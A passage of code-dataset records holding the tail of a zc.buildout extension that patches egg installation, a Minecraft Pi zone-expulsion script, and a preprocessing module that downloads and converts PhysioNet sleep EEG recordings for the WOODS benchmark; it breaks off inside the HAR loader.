tempfile.mkdtemp(dir=dest)\n\n try:\n\n args = [sys.executable, '-c',\n zc.buildout.easy_install._easy_install_cmd, '-mZUNxd', tmp]\n if self.verbose:\n args.append('-v')\n else:\n args.append('-q')\n\n links = self.buildout.get('find-links', '')\n if links: args.extend(['-f', links])\n\n args.append(spec)\n\n if logger.getEffectiveLevel() <= logging.DEBUG:\n logger.debug('Running easy_install:\\n\"%s\"\\npath=%s\\n',\n '\" \"'.join(args),\n os.pathsep.join(tools.get_pythonpath(ws, self.buildout, self.prefixes)),\n )\n\n sys.stdout.flush() # We want any pending output first\n\n exit_code = subprocess.call(list(args),\n env=dict(\n os.environ,\n PYTHONPATH=os.pathsep.join(tools.get_pythonpath(ws, self.buildout, self.prefixes)),\n ),\n )\n\n dists = []\n env = pkg_resources.Environment([tmp])\n for project in env:\n dists.extend(env[project])\n\n if exit_code:\n logger.error(\n \"An error occurred when trying to install %s. 
\"\n \"Look above this message for any errors that \"\n \"were output by easy_install.\",\n dist)\n\n if not dists:\n raise zc.buildout.UserError(\"Couldn't install: %s\" % dist)\n\n if len(dists) > 1:\n logger.warn(\"Installing %s\\n\"\n \"caused multiple distributions to be installed:\\n\"\n \"%s\\n\",\n dist, '\\n'.join(map(str, dists)))\n else:\n d = dists[0]\n if d.project_name != dist.project_name:\n logger.warn(\"Installing %s\\n\"\n \"Caused installation of a distribution:\\n\"\n \"%s\\n\"\n \"with a different project name.\",\n dist, d)\n if d.version != dist.version:\n logger.warn(\"Installing %s\\n\"\n \"Caused installation of a distribution:\\n\"\n \"%s\\n\"\n \"with a different version.\",\n dist, d)\n\n result = []\n for d in dists:\n newloc = os.path.join(dest, os.path.basename(d.location))\n if os.path.exists(newloc):\n if os.path.isdir(newloc):\n shutil.rmtree(newloc)\n else:\n os.remove(newloc)\n os.rename(d.location, newloc)\n\n [d] = pkg_resources.Environment([newloc])[d.project_name]\n\n result.append(d)\n\n return result\n\n finally:\n shutil.rmtree(tmp)\n self.envwrapper.unset()\n\nclass Extension:\n\n def __init__(self, buildout):\n\n self.buildout = buildout['buildout']\n\n # shall we be verbose?\n self.verbose = tools.verbose(self.buildout)\n\n # replace zc.buildout's installer by our modified version, it will be\n # called indirectly by this extension, via zc.buildout\n self.installer = Installer(buildout)\n\n def develop(self, setup, dest, build_ext=None, executable=sys.executable):\n\n assert executable == sys.executable, (executable, sys.executable)\n if os.path.isdir(setup):\n directory = setup\n setup = os.path.join(directory, 'setup.py')\n else:\n directory = os.path.dirname(setup)\n\n working_set = tools.working_set(self.buildout)\n tools.satisfy_requirements(self.buildout, directory, working_set)\n\n self.installer.envwrapper.set()\n undo = []\n undo.append(self.installer.envwrapper.unset)\n\n try:\n\n if build_ext:\n setup_cfg = os.path.join(directory, 'setup.cfg')\n if os.path.exists(setup_cfg):\n os.rename(setup_cfg, setup_cfg+'-develop-aside')\n def restore_old_setup():\n if os.path.exists(setup_cfg):\n os.remove(setup_cfg)\n os.rename(setup_cfg+'-develop-aside', setup_cfg)\n undo.append(restore_old_setup)\n else:\n open(setup_cfg, 'w')\n undo.append(lambda: os.remove(setup_cfg))\n setuptools.command.setopt.edit_config(\n setup_cfg, dict(build_ext=build_ext))\n\n fd, tsetup = tempfile.mkstemp()\n undo.append(lambda: os.remove(tsetup))\n undo.append(lambda: os.close(fd))\n\n os.write(fd, (runsetup_template % dict(\n # we reverse the order because we want the user paths to be inserted last ([::-1]).\n paths=os.pathsep.join(tools.get_pythonpath(working_set, self.buildout, self.installer.prefixes)[::-1]),\n setup=setup,\n setupdir=directory,\n __file__ = setup,\n )).encode())\n\n tmp3 = tempfile.mkdtemp('build', dir=dest)\n undo.append(lambda : shutil.rmtree(tmp3))\n\n args = [executable, tsetup, '-q', 'develop', '-mxN', '-d', tmp3]\n if self.verbose: args[2] = '-v'\n\n logger.debug(\"in: %r\\n%s\", directory, ' '.join(args))\n\n zc.buildout.easy_install.call_subprocess(args)\n\n return zc.buildout.easy_install._copyeggs(tmp3, dest, '.egg-link', undo)\n\n finally:\n undo.reverse()\n [f() for f in undo]\n\n\ndef _dists_sig(dists):\n '''Override of zc.buildout.buildout._dists_sig() to avoid excessive\n directory hashing on \"normal\" distributions'''\n\n seen = set()\n result = []\n for dist in dists:\n if dist in seen:\n continue\n seen.add(dist)\n 
location = dist.location\n        result.append(os.path.basename(location))\n    return result\n\n\ndef extension(buildout):\n    \"\"\"Monkey patches zc.buildout.easy_install.develop\"\"\"\n\n    ext = Extension(buildout)\n    zc.buildout.easy_install.develop = ext.develop\n    zc.buildout.easy_install.Installer._call_easy_install = ext.installer\n    zc.buildout.buildout._dists_sig = _dists_sig\n","sub_path":"bob/buildout/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"617255786","text":"import mcpi.minecraft as minecraft\nimport time\nmc = minecraft.Minecraft.create(\"172.107.176.98\")\n\nZ2 = -252\nZ1 = -258\nX1 = 286\nX2 = 296\nHOME_X = X2 + 2\nHOME_Y = 80\nHOME_Z = Z2 - 2\n\nrent = 0\ninField = 0\n\nwhile True:\n    time.sleep(1)\n    pos = mc.player.getTilePos()\n    if X1 < pos.x < X2 and Z1 < pos.z < Z2:\n        rent = rent + 1\n        mc.postToChat(\"You have been in the No-No Zone for \" + str(rent) + \" seconds.\")\n        inField = inField + 1\n    else:\n        inField = 0\n    if inField > 5:\n        mc.postToChat(\"You have been expelled from the No-No Zone!\")\n        mc.player.setPos(HOME_X, HOME_Y, HOME_Z)\n        rent = 0","sub_path":"MinecraftScripts/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"340443551","text":"\"\"\"This module is used to run the raw download and preprocessing of the data yourself\n\nYou can directly download the preprocessed data with the download.py module.\nThis module is released only for transparency about how the datasets are preprocessed.\nIt also gives the most courageous the opportunity to change the preprocessing approaches of the data out of curiosity.\n\nNote:\n    The intention of releasing the benchmarks of woods is to investigate the performance of domain generalization techniques.\n    Although some preprocessing tricks could lead to better OoD performance, this approach is not encouraged when using the WOODS benchmarks.\n\"\"\"\n\nimport os\nimport csv\nimport mne\nimport copy\nimport json\nimport glob\nimport h5py\nimport xlrd\nimport argparse\nimport datetime\nimport numpy as np\nimport subprocess\nimport pyedflib\n\n# Local import\nfrom woods.datasets import DATASETS\n\n# Preprocessing tools imports\nfrom scipy.signal import resample\nfrom sklearn.preprocessing import scale\n\n# Torch import\nimport torchvision\nfrom torchvision.transforms import Compose, Resize, Lambda\nfrom torchvision.transforms._transforms_video import (\n    ToTensorVideo,\n    NormalizeVideo,\n)\nfrom pytorchvideo.transforms import UniformTemporalSubsample\n\n# For MI dataset\nfrom moabb.datasets import BNCI2014001, Cho2017, PhysionetMI\nfrom moabb.paradigms import MotorImagery\nfrom moabb import utils\n\n# For LSA64 dataset\nfrom mega import Mega\n\nclass CAP():\n    \"\"\" Fetch the data from the PhysioNet website and preprocess it \n\n    The download is automatic but if you want to manually download::\n\n        wget -r -N -c -np https://physionet.org/files/capslpdb/1.0.0/\n\n    Args:\n        flags (argparse.Namespace): The flags of the script\n    \"\"\"\n    files = [\n        [ 'physionet.org/files/capslpdb/1.0.0/nfle29',\n            'physionet.org/files/capslpdb/1.0.0/nfle7',\n            'physionet.org/files/capslpdb/1.0.0/nfle1',\n            'physionet.org/files/capslpdb/1.0.0/nfle5',\n            'physionet.org/files/capslpdb/1.0.0/n11',\n            'physionet.org/files/capslpdb/1.0.0/rbd18',\n            'physionet.org/files/capslpdb/1.0.0/plm9',\n
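            # editor's note: each inner list of 'files' holds the recordings acquired on one\n            # EEG machine; CAP.__init__ below writes each of them to its own h5 group\n            # ('Machine0' .. 'Machine4'), i.e. one domain per machine.\n            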
'physionet.org/files/capslpdb/1.0.0/nfle35',\n 'physionet.org/files/capslpdb/1.0.0/nfle36',\n 'physionet.org/files/capslpdb/1.0.0/nfle2',\n 'physionet.org/files/capslpdb/1.0.0/nfle38',\n 'physionet.org/files/capslpdb/1.0.0/nfle39',\n 'physionet.org/files/capslpdb/1.0.0/nfle21'],\n [ 'physionet.org/files/capslpdb/1.0.0/nfle10',\n 'physionet.org/files/capslpdb/1.0.0/nfle11',\n 'physionet.org/files/capslpdb/1.0.0/nfle19',\n 'physionet.org/files/capslpdb/1.0.0/nfle26',\n 'physionet.org/files/capslpdb/1.0.0/nfle23'],\n [ 'physionet.org/files/capslpdb/1.0.0/rbd8',\n 'physionet.org/files/capslpdb/1.0.0/rbd5',\n 'physionet.org/files/capslpdb/1.0.0/rbd11',\n 'physionet.org/files/capslpdb/1.0.0/ins8',\n 'physionet.org/files/capslpdb/1.0.0/rbd10'],\n [ 'physionet.org/files/capslpdb/1.0.0/n3',\n 'physionet.org/files/capslpdb/1.0.0/nfle30',\n 'physionet.org/files/capslpdb/1.0.0/nfle13',\n 'physionet.org/files/capslpdb/1.0.0/nfle18',\n 'physionet.org/files/capslpdb/1.0.0/nfle24',\n 'physionet.org/files/capslpdb/1.0.0/nfle4',\n 'physionet.org/files/capslpdb/1.0.0/nfle14',\n 'physionet.org/files/capslpdb/1.0.0/nfle22',\n 'physionet.org/files/capslpdb/1.0.0/n5',\n 'physionet.org/files/capslpdb/1.0.0/nfle37'],\n [ 'physionet.org/files/capslpdb/1.0.0/nfle3',\n 'physionet.org/files/capslpdb/1.0.0/nfle40',\n 'physionet.org/files/capslpdb/1.0.0/nfle15',\n 'physionet.org/files/capslpdb/1.0.0/nfle12',\n 'physionet.org/files/capslpdb/1.0.0/nfle28',\n 'physionet.org/files/capslpdb/1.0.0/nfle34',\n 'physionet.org/files/capslpdb/1.0.0/nfle16',\n 'physionet.org/files/capslpdb/1.0.0/nfle17']\n ]\n\n def __init__(self, flags):\n super(CAP, self).__init__()\n\n ## Download \n download_process = subprocess.Popen(['wget', '-r', '-N', '-c', '-np', 'https://physionet.org/files/capslpdb/1.0.0/', '-P', flags.data_path])\n download_process.wait()\n \n ## Process data into machines\n common_channels = self.gather_EEG(flags)\n\n ## Cluster data into machines and save\n for i, env_set in enumerate(self.files):\n\n for j, recording in enumerate(env_set):\n\n # Create data path\n edf_path = os.path.join(flags.data_path, recording + '.edf')\n txt_path = os.path.join(flags.data_path, recording + '.txt')\n\n # Fetch all data\n data = mne.io.read_raw_edf(edf_path)\n ch = [og_ch for og_ch in data.ch_names if og_ch.lower() in common_channels]\n data = data.pick_channels(ch)\n labels, times = self.read_annotation(txt_path)\n\n # Get labels\n labels = self.string_2_label(labels)\n\n # Sample and filter\n data.resample(100)\n data.filter(l_freq=0.3, h_freq=30)\n\n # Get the indexes\n start = data.info['meas_date']\n times = [(t_s.replace(tzinfo=start.tzinfo), t_e.replace(tzinfo=start.tzinfo)) for (t_s, t_e) in times]\n time_diff = [ ((t_s - start).total_seconds(), (t_e - start).total_seconds()) for (t_s, t_e) in times]\n t_s, t_e = [t_s for (t_s, t_e) in time_diff], [t_e for (t_s, t_e) in time_diff]\n index_s = data.time_as_index(t_s)\n index_e = data.time_as_index(t_e)\n\n # Split the data \n seq = np.array([data.get_data(start=s, stop=e) for s, e in zip(index_s, index_e) if e <= len(data)])\n labels = np.array([[l] for l, e in zip(labels, index_e) if e <= len(data)])\n\n # Add data to container\n env_data = np.zeros((0, 19, 3000))\n env_labels = np.zeros((0, 1))\n env_data = np.append(env_data, seq, axis=0)\n env_labels = np.append(env_labels, labels, axis=0)\n\n # Reshape and scale the data\n sc = mne.decoding.Scaler(scalings='mean')\n env_data = sc.fit_transform(env_data)\n env_data = np.transpose(env_data, (0,2,1))\n\n with 
h5py.File(os.path.join(flags.data_path, 'physionet.org/CAP_DB.h5'), 'a') as hf:\n if j == 0:\n g = hf.create_group('Machine' + str(i))\n g.create_dataset('data', data=env_data.astype('float32'), dtype='float32', maxshape=(None, 3000, 19))\n g.create_dataset('labels', data=env_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n else:\n hf['Machine' + str(i)]['data'].resize((hf['Machine' + str(i)]['data'].shape[0] + env_data.shape[0]), axis = 0)\n hf['Machine' + str(i)]['data'][-env_data.shape[0]:,:,:] = env_data\n hf['Machine' + str(i)]['labels'].resize((hf['Machine' + str(i)]['labels'].shape[0] + env_labels.shape[0]), axis = 0)\n hf['Machine' + str(i)]['labels'][-env_labels.shape[0]:,:] = env_labels\n \n # Remove useless files\n self.remove_useless(flags)\n\n def remove_useless(self, flags):\n \"\"\" Remove useless files \"\"\"\n\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0/*')):\n print(\"Removing: \", file)\n os.remove(file)\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files'))\n print(\"Removing: \", os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n os.remove(os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n\n def string_2_label(self, string):\n \"\"\" Convert string to label \"\"\"\n \n label_dict = { 'W':0,\n 'S1':1,\n 'S2':2,\n 'S3':3,\n 'S4':4,\n 'R':5}\n \n labels = [label_dict[s] for s in string]\n\n return labels\n\n def read_annotation(self, txt_path):\n \"\"\" Read annotation file for the CAP dataset\"\"\"\n\n # Initialize storage\n labels = []\n times = []\n durations = []\n\n with open(txt_path, 'r') as file:\n lines = file.readlines()\n\n in_table = False\n for line in lines:\n if line[0:16] == 'Recording Date:\t':\n date = [int(u) for u in line.strip('\\n').split('\\t')[1].split('/')]\n\n if in_table:\n line_list = line.split(\"\\t\")\n if line_list[event_id][0:5] == 'SLEEP' and (position_id == None or line_list[position_id] != 'N/A'):\n labels.append(line_list[label_id])\n durations.append(line_list[duration_id])\n t = line_list[time_id].split(':') if ':' in line_list[time_id] else line_list[time_id].split('.')\n t = [int(u) for u in t]\n dt = datetime.datetime(*date[::-1], *t) + datetime.timedelta(days=int(t[0]<12))\n times.append((dt, dt + datetime.timedelta(seconds=int(line_list[duration_id]))))\n\n if line[0:11] == 'Sleep Stage':\n columns = line.split(\"\\t\")\n label_id = columns.index('Sleep Stage')\n time_id = columns.index('Time [hh:mm:ss]')\n duration_id = columns.index('Duration[s]')\n try:\n position_id = columns.index('Position')\n except ValueError:\n position_id = None\n event_id = columns.index('Event')\n in_table = True\n\n return labels, times\n\n def gather_EEG(self, flags):\n \"\"\" Gets the intersection of common channels across all machines \n \n Returns:\n list: list of channels (strings)\n \"\"\"\n machine_id = 0\n machines = {}\n edf_file = []\n table = []\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0/*.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = 
pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n\n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n \n _table = []\n for id, machine in machines.items():\n if machine['amount'] > 4:\n ch = [c[0] for c in machine['state']]\n freq = [c[1] for c in machine['state']]\n\n _table.append(set(ch))\n print(\"___________________________________________________\")\n print(\"Machine ID: \", id)\n print(\"Recording amount: \", machine['amount'])\n print(\"Channels: \", ch)\n print('Freqs: ', freq)\n print(\"Dates:\")\n for d in machine['dates']:\n print(d)\n print(\"Files:\")\n for f in machine['names']:\n print(f)\n\n return list(set.intersection(*_table))\n \nclass SEDFx_DB():\n \"\"\" Fetch the PhysioNet Sleep-EDF Database Expanded Dataset and preprocess it\n \n The download is automatic but if you want to manually download::\n\n wget -r -N -c -np https://physionet.org/files/sleep-edfx/1.0.0/\n \n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n def __init__(self, flags):\n super(SEDFx_DB, self).__init__()\n\n ## Download \n download_process = subprocess.Popen(['wget', '-r', '-N', '-c', '-np', 'https://physionet.org/files/sleep-edfx/1.0.0/', '-P', flags.data_path])\n download_process.wait()\n \n ## Process data into machines\n common_channels = self.gather_EEG(flags)\n\n ## Set labels\n label_dict = { 'Sleep stage W':0,\n 'Sleep stage 1':1,\n 'Sleep stage 2':2,\n 'Sleep stage 3':3,\n 'Sleep stage 4':4,\n 'Sleep stage R':5}\n\n ## Get subjects from xls file\n SC_dict = {}\n SC_xls = xlrd.open_workbook(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/SC-subjects.xls')).sheet_by_index(0)\n for row in range(1, SC_xls.nrows):\n if int(SC_xls.cell_value(row,0)) not in SC_dict.keys():\n SC_dict[int(SC_xls.cell_value(row,0))] = {}\n SC_dict[int(SC_xls.cell_value(row,0))]['nights'] = ['SC4{:02d}{}'.format(int(SC_xls.cell_value(row,0)), int(SC_xls.cell_value(row,1)))]\n SC_dict[int(SC_xls.cell_value(row,0))]['folder'] = 'physionet.org/files/sleep-edfx/1.0.0/sleep-cassette'\n else:\n SC_dict[int(SC_xls.cell_value(row,0))]['nights'].append('SC4{:02d}{}'.format(int(SC_xls.cell_value(row,0)), int(SC_xls.cell_value(row,1))))\n SC_dict[int(SC_xls.cell_value(row,0))]['age'] = int(SC_xls.cell_value(row,2))\n SC_dict[int(SC_xls.cell_value(row,0))]['sex'] = int(SC_xls.cell_value(row,3))\n ST_dict = {}\n ST_xls = xlrd.open_workbook(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/ST-subjects.xls')).sheet_by_index(0)\n for row in range(2, ST_xls.nrows):\n ST_dict[int(ST_xls.cell_value(row,0))] = {}\n ST_dict[int(ST_xls.cell_value(row,0))]['folder'] = 'physionet.org/files/sleep-edfx/1.0.0/sleep-telemetry'\n ST_dict[int(ST_xls.cell_value(row,0))]['nights'] = 
['ST7{:02d}{}'.format(int(ST_xls.cell_value(row,0)), int(ST_xls.cell_value(row,3))), \n 'ST7{:02d}{}'.format(int(ST_xls.cell_value(row,0)), int(ST_xls.cell_value(row,5)))]\n ST_dict[int(ST_xls.cell_value(row,0))]['age'] = int(ST_xls.cell_value(row,1))\n ST_dict[int(ST_xls.cell_value(row,0))]['sex'] = 2 if int(ST_xls.cell_value(row,2))==1 else 1\n\n ## Create group in h5 file\n dummy_data = np.zeros((0,3000,4))\n dummy_labels = np.zeros((0,1))\n groups = ['Age 20-40', 'Age 40-60', 'Age 60-80', 'Age 80-100']\n with h5py.File(os.path.join(flags.data_path, 'physionet.org/SEDFx_DB.h5'), 'a') as hf:\n for g in groups:\n g = hf.create_group(g)\n g.create_dataset('data', data=dummy_data.astype('float32'), dtype='float32', maxshape=(None, 3000, 4))\n g.create_dataset('labels', data=dummy_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n\n ## Cluster data into machines and save\n for db in [SC_dict, ST_dict]:\n for subject, subject_info in db.items():\n\n # Find Age group\n if 20 < subject_info['age'] <= 40:\n age_group = groups[0]\n elif 40 < subject_info['age'] <= 60:\n age_group = groups[1]\n elif 60 < subject_info['age'] <= 80:\n age_group = groups[2]\n elif 80 < subject_info['age']:\n age_group = groups[3]\n else:\n print(\"Age group counldn't be found\")\n \n for night in subject_info['nights']:\n edf_path = os.path.join(flags.data_path, subject_info['folder'], night+ '*')\n\n # Fetch file name\n PSG_file = glob.glob(edf_path+'PSG.edf')[0]\n hypno_file = glob.glob(edf_path+'Hypnogram.edf')[0]\n\n # Read raw data and pick channels\n data = mne.io.read_raw_edf(PSG_file)\n ch = [og_ch for og_ch in data.ch_names if og_ch.lower() in common_channels]\n data = data.pick_channels(ch)\n data.resample(100)\n data.filter(l_freq=0.3, h_freq=30)\n\n # Get annotations i.e. labels, crop the big start and end chunks of recordings\n annot = mne.read_annotations(hypno_file)\n annot.crop(annot[1]['onset'] - 30 * 60, annot[-2]['onset'] + 30 * 60)\n data.set_annotations(annot, emit_warning=False)\n\n events, event_id = mne.events_from_annotations(data, chunk_duration=30., event_id=label_dict)\n # mne.viz.plot_events(events, sfreq=data.info['sfreq'])\n tmax = 30. - 1. 
/ data.info['sfreq']  # tmax is inclusive\n\n                    epochs_data = mne.Epochs(raw=data, events=events,\n                                             event_id=event_id, tmin=0., tmax=tmax, baseline=None)\n\n                    # Add data to container\n                    input_data = epochs_data.get_data()\n                    labels = events[:,2:]\n\n                    # Reshape and scale the data\n                    sc = mne.decoding.Scaler(scalings='mean')\n                    input_data = sc.fit_transform(input_data)\n                    input_data = np.transpose(input_data, (0,2,1))\n\n                    with h5py.File(os.path.join(flags.data_path, 'physionet.org/SEDFx_DB.h5'), 'a') as hf:\n                        hf[age_group]['data'].resize((hf[age_group]['data'].shape[0] + input_data.shape[0]), axis = 0)\n                        hf[age_group]['data'][-input_data.shape[0]:,:,:] = input_data\n                        hf[age_group]['labels'].resize((hf[age_group]['labels'].shape[0] + labels.shape[0]), axis = 0)\n                        hf[age_group]['labels'][-labels.shape[0]:,:] = labels\n\n        # Remove useless files\n        self.remove_useless(flags)\n\n    def remove_useless(self, flags):\n        \"\"\" Remove the raw sleep-edfx download once the h5 file is built \"\"\"\n\n        # recordings live in the sleep-cassette/ and sleep-telemetry/ subfolders\n        for path in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/*/*')):\n            print(\"Removing: \", path)\n            os.remove(path)\n        for path in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/*')):\n            print(\"Removing: \", path)\n            if os.path.isdir(path):\n                os.rmdir(path)\n            else:\n                os.remove(path)\n        print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0'))\n        os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0'))\n        print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx'))\n        os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx'))\n        print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files'))\n        os.rmdir(os.path.join(flags.data_path, 'physionet.org/files'))\n        print(\"Removing: \", os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n        os.remove(os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n\n    def string_2_label(self, string):\n        \"\"\" Convert string to label \"\"\"\n\n        label_dict = { 'W':0,\n                    'S1':1,\n                    'S2':2,\n                    'S3':3,\n                    'S4':4,\n                    'R':5}\n\n        labels = [label_dict[s] for s in string]\n\n        return labels\n\n    def read_annotation(self, txt_path):\n        \"\"\" Read annotation file \"\"\"\n\n        # Initialize storage\n        labels = []\n        times = []\n        durations = []\n\n        with open(txt_path, 'r') as file:\n            lines = file.readlines()\n\n            in_table = False\n            for line in lines:\n                if line[0:16] == 'Recording Date:\t':\n                    date = [int(u) for u in line.strip('\\n').split('\\t')[1].split('/')]\n\n                if in_table:\n                    line_list = line.split(\"\\t\")\n                    if line_list[event_id][0:5] == 'SLEEP' and (position_id is None or line_list[position_id] != 'N/A'):\n                        labels.append(line_list[label_id])\n                        durations.append(line_list[duration_id])\n                        t = line_list[time_id].split(':') if ':' in line_list[time_id] else line_list[time_id].split('.')\n                        t = [int(u) for u in t]\n                        dt = datetime.datetime(*date[::-1], *t) + datetime.timedelta(days=int(t[0]<12))\n                        times.append((dt, dt + datetime.timedelta(seconds=int(line_list[duration_id]))))\n\n                if line[0:11] == 'Sleep Stage':\n                    columns = line.split(\"\\t\")\n                    label_id = columns.index('Sleep Stage')\n                    time_id = columns.index('Time [hh:mm:ss]')\n                    duration_id = columns.index('Duration[s]')\n                    try:\n                        position_id = columns.index('Position')\n                    except ValueError:\n                        position_id = None\n                    event_id = columns.index('Event')\n                    in_table = True\n\n        return labels, times\n\n    def gather_EEG(self, flags):\n        \"\"\" Gets the intersection of common channels across all machines \n\n        Returns:\n            list: list of channels (strings)\n        \"\"\"\n\n        machine_id = 0\n        machines = {}\n        edf_file = []\n        table = []\n        for file in glob.glob(os.path.join(flags.data_path, 
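# editor's note: first pass over the telemetry (ST) recordings; the analogous\n        # loop below does the same for the sleep-cassette (SC) recordings\n        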
'physionet.org/files/sleep-edfx/1.0.0/sleep-telemetry/*PSG.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n \n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/sleep-cassette/*PSG.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n \n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n \n _table = []\n for id, machine in machines.items():\n if machine['amount'] > 4:\n ch = [c[0] for c in machine['state']]\n freq = [c[1] for c in machine['state']]\n\n _table.append(set(ch))\n print(\"___________________________________________________\")\n print(\"Machine ID: \", id)\n print(\"Recording amount: \", machine['amount'])\n print(\"Channels: \", ch)\n print('Freqs: ', freq)\n print(\"Dates:\")\n for d in machine['dates']:\n print(d)\n print(\"Files:\")\n for f in machine['names']:\n print(f)\n\n return list(set.intersection(*_table))\n\n\ndef RealizedVolatility(flags):\n \"\"\" Fetch the realized volatility dataset from Yahoo Finance and preprocess it \n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n with open(os.path.join(flags.data_path, 'RealizedVolatility/OxfordManRealizedVolatilityIndices.csv')) as f:\n data = csv.reader(f)\n print(next(data))\n for row in data:\n print(row)\n \n\ndef HAR(flags):\n \"\"\" Fetch and preprocess the HAR dataset\n\n Note:\n You need to manually download the HAR dataset from the source and place it in the data folder in order to preprocess it yourself:\n\n https://archive.ics.uci.edu/ml/datasets/Heterogeneity+Activity+Recognition\n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n # Label definition\n label_dict = { 'stand': 0,\n 'sit': 1,\n 'walk': 2,\n 'bike': 3,\n 'stairsup': 4,\n 'stairsdown': 5,\n 'null': 6}\n\n ## Fetch all data and put it all in a big 
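nested\n    # dictionary. A sketch of the layout being built (editor's note):\n    #   data_dict[device][subject]['acc' or 'gyro'] -> {'n_pt', 'index', 'time', 'meas', 'label'}\n    # i.e. everything ends up in one big 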
dict\n data_dict = {}\n for file in glob.glob(os.path.join(flags.data_path, 'HAR/*.csv')):\n print(file)\n\n # Get modality\n if 'gyroscope' in file:\n mod = 'gyro'\n elif 'accelerometer' in file:\n mod = 'acc'\n\n # Get number of time steps for all recordings\n with open(file) as f:\n data = csv.reader(f)\n next(data)\n for row in data:\n if row[8] not in data_dict.keys():\n print(row[8])\n data_dict[row[8]] = {}\n if row[6] not in data_dict[row[8]].keys():\n print('\\t' + row[6])\n data_dict[row[8]][row[6]] = {}\n if mod not in data_dict[row[8]][row[6]].keys():\n print('\\t\\t' + mod)\n data_dict[row[8]][row[6]][mod] = {}\n data_dict[row[8]][row[6]][mod]['n_pt'] = 0\n \n data_dict[row[8]][row[6]][mod]['n_pt'] += 1\n\n # Get data\n with open(file) as f:\n data = csv.reader(f)\n next(data)\n for row in data:\n if 'index' not in data_dict[row[8]][row[6]][mod].keys():\n i = 0\n data_dict[row[8]][row[6]][mod]['index'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n data_dict[row[8]][row[6]][mod]['time'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n data_dict[row[8]][row[6]][mod]['meas'] = 